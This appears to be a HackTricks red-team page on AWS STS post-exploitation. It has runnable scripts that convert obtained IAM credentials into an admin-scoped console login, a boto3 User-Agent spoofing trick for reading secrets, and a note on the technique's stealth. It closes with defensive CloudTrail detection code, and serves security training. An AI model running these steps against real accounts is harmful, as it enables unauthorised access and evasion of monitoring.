AWS - STS Post Exploitation

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

STS

For more information:

AWS - IAM, Identity Center & SSO Enum

From IAM Creds to Console

If you have managed to obtain some IAM credentials you may be interested in accessing the web console using the following tools.
Note that the user/role must have the sts:GetFederationToken permission.

Custom script

The following script uses the default profile and the default AWS region (not gov and not cn) to give you a signed URL that you can use to log in to the web console:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
status=$?

if [ "$status" -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit "$status"
fi

# Parse the output
session_id=$(echo "$output" | jq -r '.Credentials.AccessKeyId')
session_key=$(echo "$output" | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo "$output" | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
# Extract the token and URL-encode it for the login link
signin_token=$(echo -n "$resp" | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)

# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

You can generate a web console link using https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Warning

Make sure the IAM user has the sts:GetFederationToken permission, or give it a role to assume.

aws-vault

aws-vault is a tool to securely store and access AWS credentials in a development environment.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Note

You can also use aws-vault to obtain a browser console session.

From Web Console to IAM Creds

The browser extension https://github.com/AI-redteam/clier is able to capture IAM credentials from the network before they are protected in the browser's memory.

Bypass User-Agent restrictions from Python

If certain actions are restricted based on the user agent in use (such as blocking the python boto3 library by its user agent), you can either use the technique described above to connect to the web console via a browser, or directly modify the boto3 user-agent as follows:

# Shared by ex16x41
import boto3

# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change the User-Agent header of the client right before the request is sent
client.meta.events.register(
    'before-call.secretsmanager.GetSecretValue',
    lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'})
)

# Perform the action
response = client.get_secret_value(SecretId="flag_secret")
print(response['SecretString'])

sts:GetFederationToken

With this permission it is possible to create a federated identity for the calling user, limited to the permissions that this user has.

aws sts get-federation-token --name <username>

The token returned by sts:GetFederationToken belongs to the calling user's federated identity, but with reduced permissions. Even if the user has administrator rights, certain actions such as listing IAM users or attaching policies cannot be performed through the federated token.

Moreover, this technique is fairly stealthy, since the federated user does not appear in the AWS Portal; it can only be seen through CloudTrail logs or monitoring tools.
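Since a federated user is visible only in CloudTrail, the following added example (not from the original page) shows how a defender can correlate the GetFederationToken call with the later ConsoleLogin of the resulting federated user. The records are constructed for illustration and follow the field names of CloudTrail's documented event format; the account ID and user names are placeholders.

```python
import json

# Constructed sample CloudTrail records (not real telemetry): an IAM user requests a
# federation token scoped to AdministratorAccess, then the federated user signs in.
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetFederationToken",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"},
     "requestParameters": {"name": "consoler",
                           "policyArns": [{"arn": "arn:aws:iam::aws:policy/AdministratorAccess"}]},
     "responseElements": {"federatedUser": {
         "arn": "arn:aws:sts::123456789012:federated-user/consoler"}}},
    {"eventTime": "2024-01-01T10:01:30Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin",
     "userIdentity": {"type": "FederatedUser",
                      "arn": "arn:aws:sts::123456789012:federated-user/consoler",
                      "sessionContext": {"sessionIssuer": {
                          "arn": "arn:aws:iam::123456789012:user/alice"}}},
     "responseElements": {"ConsoleLogin": "Success"}},
]

# Policies whose presence in a federation request deserves the highest severity
BROAD_POLICIES = {"arn:aws:iam::aws:policy/AdministratorAccess"}

def find_federation_console_access(events):
    """Flag GetFederationToken calls and console logins by federated identities,
    linking the two through the federated-user ARN returned by STS."""
    tokens = {}    # federated-user ARN -> issuing GetFederationToken event
    findings = []
    for ev in events:
        ident = ev.get("userIdentity", {})
        if ev.get("eventSource") == "sts.amazonaws.com" and ev.get("eventName") == "GetFederationToken":
            fed_arn = ev.get("responseElements", {}).get("federatedUser", {}).get("arn")
            policies = {p.get("arn") for p in ev.get("requestParameters", {}).get("policyArns", [])}
            tokens[fed_arn] = ev
            findings.append({"kind": "federation_token",
                             "severity": "high" if policies & BROAD_POLICIES else "medium",
                             "caller": ident.get("arn"), "federated_user": fed_arn,
                             "policies": sorted(policies), "time": ev.get("eventTime")})
        elif ev.get("eventName") == "ConsoleLogin" and ident.get("type") == "FederatedUser":
            fed_arn = ident.get("arn")
            issuer = ident.get("sessionContext", {}).get("sessionIssuer", {}).get("arn")
            findings.append({"kind": "federated_console_login", "severity": "high",
                             "federated_user": fed_arn, "issuer": issuer,
                             "token_event_seen": fed_arn in tokens, "time": ev.get("eventTime")})
    return findings

if __name__ == "__main__":
    for finding in find_federation_console_access(SAMPLE_EVENTS):
        print(json.dumps(finding))
```

In practice the same function can be run over records pulled from CloudTrail Lake or an S3 trail; a console login by a federated user whose issuing GetFederationToken call is missing from the window is worth investigating on its own.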
